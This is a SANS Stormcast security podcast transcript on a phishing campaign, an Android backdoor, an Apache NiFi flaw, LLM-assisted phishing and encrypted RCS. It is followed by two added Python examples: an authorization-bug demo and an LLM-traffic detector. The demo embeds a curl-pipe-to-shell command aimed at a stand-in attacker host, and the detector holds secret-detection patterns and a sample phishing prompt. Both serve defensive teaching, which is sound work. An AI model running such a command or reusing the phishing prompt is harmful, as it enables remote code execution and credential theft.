
SANS Stormcast Wednesday, February 18th, 2026: IR Phishing; Keenadu Android Backdoor; NiFi Bugs; LLMs Phishing; Encrypted RCS

Audio file: https://traffic.libsyn.com/securitypodcast/9814.mp3


Fake Incident Report Used in Phishing Campaign
https://isc.sans.edu/diary/Fake%20Incident%20Report%20Used%20in%20Phishing%20Campaign/32722

Divide and conquer: how the new Keenadu backdoor exposed links between major Android botnets
https://securelist.com/keenadu-android-backdoor/118913/

CVE-2026-25903: Apache NiFi: Missing Authorization of Restricted Permissions for Component Updates
https://seclists.org/oss-sec/2026/q1/166

The Next Frontier of Runtime Assembly Attacks: Leveraging LLMs to Generate Phishing JavaScript in Real Time
https://unit42.paloaltonetworks.com/real-time-malicious-javascript-through-llms/

Encrypted RCS in iOS/iPadOS
https://developer.apple.com/documentation/ios-ipados-release-notes/ios-ipados-26_4-release-notes

Podcast Transcript

Hello and welcome to the Wednesday, February 18th, 2026 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recording today from Jacksonville, Florida. And this episode is brought to you by the SANS.edu graduate certificate program in incident response. Just a quick note for those of you who are watching this on YouTube: sorry, no camera today, having some little technical issues.

Today's diary is coming from Xavier again. He's on a roll lately, and this latest one is a little bit of a different phishing campaign. One of the goals of phishing campaigns is always to create some urgency to make you do something quickly because, well, there is some kind of emergency, and what they're doing here is essentially pretending that there was an incident, some odd login to your crypto wallet, that would cause you to now implement two-factor authentication. Not sure if they just assume that you didn't do it or if they think that you may ignore it if you already have two-factor authentication enabled. This particular phishing email did affect MetaMask users. No indication here that MetaMask is at all involved in this, so this is not a MetaMask breach or anything like this. They're just sending this to random people on the internet hoping that they will get some actual MetaMask users that will then fall for this phishing email. And as usual, cryptocurrency wallets are still one of the top targets of these kinds of phishing emails.

And the Android ecosystem continues to be haunted by devices that come preinstalled with malicious firmware. Kaspersky has the latest documented incident of this. They call it the Keenadu backdoor, and apparently it was preinstalled on these affected devices and was added during the build phase for the firmware. Now, we have seen sort of various picture frames and such with compromised firmware in the past, and what often happens is that systems on the production lines or so are getting infected and then being used to install these malicious backdoors. The takedown here of this backdoor, I should rather say the reverse analysis of it, is rather neat. So real good work here by Kaspersky, helping us understand what the particular backdoor does and also how they analyzed this malicious code.

And then we have a new vulnerability in Apache's NiFi data processing service. This particular software, well, if you have seen it being attacked before, that's why I mentioned it here. It's one of those data processing pipelines. It's written in Java and presents a nice web-based admin interface that allows you to, sort of, you know, add different components to extract data and then send it out in a standard format. So often used for things like machine learning or such in order to pre-prepare various data sets and such to be easily imported in your particular machine learning pipeline. Well, the problem here is that even if you did require permissions for particular components that you sort of have configured, that may be bypassed, and this restricted annotation that indicates that additional privileges are required may be ignored. So I mentioned before with NiFi, it's not really one of those systems that you really want to expose to the internet. Where I do see it exposed to the internet is where you have data scientists and such that set it up on a cloud server without necessarily understanding the security implications of doing so. So definitely one of those things you want to get a handle on and, if possible, catalog these installs.

And Palo Alto's Unit 42 came up with an interesting abuse case for large language models. The trick here is where you're actually using the large language model to create phishing pages. The way this works is where the victim is basically being tricked into sending a prompt to the large language model that will then return the JavaScript that is then being used to create the phishing page. The reason this is interesting is that, first of all, the malicious JavaScript is now coming from an overall trusted site that basically is often whitelisted and as such, you know, not filtered and inspected that carefully. And secondly, that the user also doesn't necessarily get sort of the usual warning messages that would accompany any phishing message and phishing webpage like that. So a pretty interesting trick. It's currently not used in the wild. This is really sort of just some threat research, but they do show a proof of concept how this could happen and how this could be implemented. So probably not too long before we see something like this in the wild. And as so often, you must sort of put some controls around data being sent to and from these large language models, if it's not for phishing, at least for things like data exfiltration that often happens accidentally with those sites.

And then we have an interesting update from Apple for its next release of iOS and iPadOS. Apple just released iOS and iPadOS 26.3 and now released public betas for 26.4. 26.4 introduces end-to-end encryption for RCS. RCS is, well, supposed to replace SMS at one point and essentially fixes some of the security problems that we had with SMS. SMS was in the clear, not authenticated, so not really suitable for anything of any security relevance. Well, with RCS some of these issues are supposed to be fixed, but this depends on vendors actually implementing these features in their operating systems. Apple has initially been a little bit slow in sort of jumping on the RCS bandwagon here. But they are supporting it currently, however only some of the basic features like markup and other sort of more look-and-feel features of RCS. With this addition of end-to-end encryption, there's a good chance that in the next version of iOS/iPadOS, which will probably come out in a month or so, we'll see some of these more advanced security features show up in iOS/iPadOS as well. And of course, in order to actually use these features sort of in your applications, you probably want at least iOS and Android support to get a good coverage for most of your users' devices.

Well, and this is it for today, so thanks again for listening. Sorry again for no camera today, and hopefully I'll have it fixed tomorrow. So talk to you again tomorrow. Bye.
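The NiFi segment above describes a class of authorization bug: a component type carries a "restricted" annotation meaning extra privileges are needed, but the update path only checks the ordinary permission. The following is an added illustration of that bug class in a deliberately simplified model, not Apache NiFi's code and not a description of how CVE-2026-25903 is actually implemented. The permission names (`write:<component-id>`, `restricted-components`), the classes, and the `ExecuteScript` sample type are all assumptions made for the example.

```python
"""Hypothetical model of a missing 'restricted component' authorization check.

Added example, not NiFi's code. It models the bug class only: a component
type flagged as restricted needs an extra permission beyond the ordinary
per-component write permission, and the vulnerable update path forgets it.
"""
from dataclasses import dataclass, field

# Assumed name of the global permission that restricted components require.
RESTRICTED_COMPONENTS_PERMISSION = "restricted-components"


@dataclass(frozen=True)
class ComponentType:
    name: str
    restricted: bool = False  # stands in for a @Restricted-style annotation


@dataclass
class Component:
    component_id: str
    ctype: ComponentType
    config: dict = field(default_factory=dict)


@dataclass
class User:
    name: str
    permissions: set = field(default_factory=set)


class AuthorizationError(Exception):
    pass


def has_write(user: User, component: Component) -> bool:
    """Ordinary per-component write permission (assumed naming scheme)."""
    return f"write:{component.component_id}" in user.permissions


def update_component_vulnerable(user: User, component: Component, new_config: dict) -> dict:
    """Bug class: only the per-component write permission is checked, so a
    user who may edit the component can reconfigure it even though its type
    is restricted. The dangerous config is really applied."""
    if not has_write(user, component):
        raise AuthorizationError(f"{user.name}: no write permission on {component.component_id}")
    component.config.update(new_config)
    return component.config


def update_component_fixed(user: User, component: Component, new_config: dict) -> dict:
    """Hardened: a restricted component additionally requires the restricted
    components permission on update, not just on creation."""
    if not has_write(user, component):
        raise AuthorizationError(f"{user.name}: no write permission on {component.component_id}")
    if component.ctype.restricted and RESTRICTED_COMPONENTS_PERMISSION not in user.permissions:
        raise AuthorizationError(
            f"{user.name}: {component.ctype.name} is restricted, "
            f"{RESTRICTED_COMPONENTS_PERMISSION} permission required"
        )
    component.config.update(new_config)
    return component.config


def attempt(update_fn, user: User, component: Component, new_config: dict) -> bool:
    """Run an update function and report whether it was authorized."""
    try:
        update_fn(user, component, dict(new_config))
        return True
    except AuthorizationError:
        return False


def demo() -> dict:
    """Constructed scenario: a writer without the restricted permission tries
    to point a restricted script-running component at a hostile command."""
    exec_type = ComponentType("ExecuteScript", restricted=True)  # assumed restricted type
    writer = User("analyst", {"write:proc-1"})
    hostile = {"script": "curl http://attacker.invalid/x | sh"}
    vuln = Component("proc-1", exec_type, {"script": "echo ok"})
    fixed = Component("proc-1", exec_type, {"script": "echo ok"})
    return {
        "vulnerable_allowed": attempt(update_component_vulnerable, writer, vuln, hostile),
        "fixed_allowed": attempt(update_component_fixed, writer, fixed, hostile),
        "vulnerable_config": vuln.config["script"],
        "fixed_config": fixed.config["script"],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The hardened path checks the restricted permission on every state-changing operation (create, update, and anything that can swap the component's type or properties), not only on creation; the hypothetical `update_component_vulnerable` is exactly the pattern where the annotation is honoured at one entry point and forgotten at another.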
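The Unit 42 segment above makes two points: a phishing page can have the victim's browser fetch its JavaScript from an allowlisted LLM API, and organisations should put controls around what goes to and comes back from those APIs anyway, if only to catch accidental data leakage. The following is an added example of the kind of inspection logic an egress proxy could apply to an LLM API exchange; it is not code from Unit 42 or from the podcast. It assumes the proxy sees prompt and completion bodies in plain text, and the host names, marker names, regexes, and sample exchanges are constructed for the example.

```python
"""Added example: inspect LLM API exchanges at an egress proxy.

Not Unit 42's code. Assumes the proxy can see the request body (prompt) and
the response body (completion) of calls to an allowlisted LLM API host, plus
the browser's Origin header. Host names and patterns are assumptions.
"""
import re
from urllib.parse import urlparse

# Assumed allowlisted LLM hosts: the API endpoint and the vendor's own chat UI.
LLM_HOSTS = {"api.llm.example", "chat.llm.example"}

# Markers of HTML/JavaScript a page could run directly from a completion.
SCRIPT_MARKERS = {
    "script_tag": re.compile(r"<script\b", re.I),
    "eval_call": re.compile(r"\beval\s*\(", re.I),
    "document_write": re.compile(r"\bdocument\.write\s*\(", re.I),
    "innerhtml_assign": re.compile(r"\.innerHTML\s*=", re.I),
    "password_field": re.compile(r"type\s*=\s*[\"']?password", re.I),
}

# Secret shapes that should never leave in a prompt (accidental exfiltration).
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\b"),
}


def script_markers(text: str) -> list:
    return sorted(name for name, pat in SCRIPT_MARKERS.items() if pat.search(text))


def secret_markers(text: str) -> list:
    return sorted(name for name, pat in SECRET_PATTERNS.items() if pat.search(text))


def _origin_host(origin):
    return urlparse(origin).hostname if origin else None


def classify_exchange(host: str, origin, prompt: str, completion: str) -> dict:
    """Classify one request/response pair to an LLM API.

    Returns the findings and a policy action: 'block' for a cross-origin page
    pulling executable script from the LLM or a prompt carrying a secret,
    'alert' for script-like completions from the vendor's own UI (developers
    asking for code are a legitimate source of these), else 'allow'.
    """
    if host not in LLM_HOSTS:
        return {"llm_traffic": False, "findings": {}, "action": "allow"}
    findings = {}
    secrets = secret_markers(prompt)
    if secrets:
        findings["secrets_in_prompt"] = secrets
    markers = script_markers(completion)
    if markers:
        findings["script_in_completion"] = markers
    ohost = _origin_host(origin)
    # The runtime-assembly trick: a third-party page, not the vendor UI,
    # is the origin of a browser request whose answer is runnable script.
    if markers and ohost and ohost not in LLM_HOSTS:
        findings["cross_origin_script_fetch"] = ohost
    if "cross_origin_script_fetch" in findings or "secrets_in_prompt" in findings:
        action = "block"
    elif markers:
        action = "alert"
    else:
        action = "allow"
    return {"llm_traffic": True, "findings": findings, "action": action}


# Constructed sample exchanges (not real captures).
SAMPLES = [
    ("phishing_page", "api.llm.example", "https://login-verify.example",
     "Return only HTML: a wallet login form with a password field, wrapped in a script tag.",
     "<script>document.write('<form><input type=\"password\" name=\"p\"></form>')</script>"),
    ("developer_in_vendor_ui", "api.llm.example", "https://chat.llm.example",
     "Write a one-liner that sets an element's innerHTML to a greeting",
     "```js\nel.innerHTML = greeting;\n```"),
    ("secret_in_prompt", "api.llm.example", "https://chat.llm.example",
     "Why does this fail? aws_access_key_id=AKIAIOSFODNN7EXAMPLE region=eu-west-1",
     "I can't help store credentials, but the region setting looks fine."),
    ("benign", "api.llm.example", "https://chat.llm.example",
     "Summarise: the meeting moved to Thursday.", "The meeting is now on Thursday."),
    ("not_llm", "cdn.example", "https://shop.example", "", "<script>init()</script>"),
]


def run_samples() -> dict:
    return {name: classify_exchange(h, o, p, c)["action"] for name, h, o, p, c in SAMPLES}


if __name__ == "__main__":
    for name, action in run_samples().items():
        print(f"{name}: {action}")
```

The Origin check is what separates the attack from normal use: a developer asking the vendor's chat UI for a snippet produces the same script markers, so on its own the completion content only justifies an alert. In practice the proxy would also need to read the JSON envelope of the real API rather than raw text, and TLS interception is a precondition for seeing any of this.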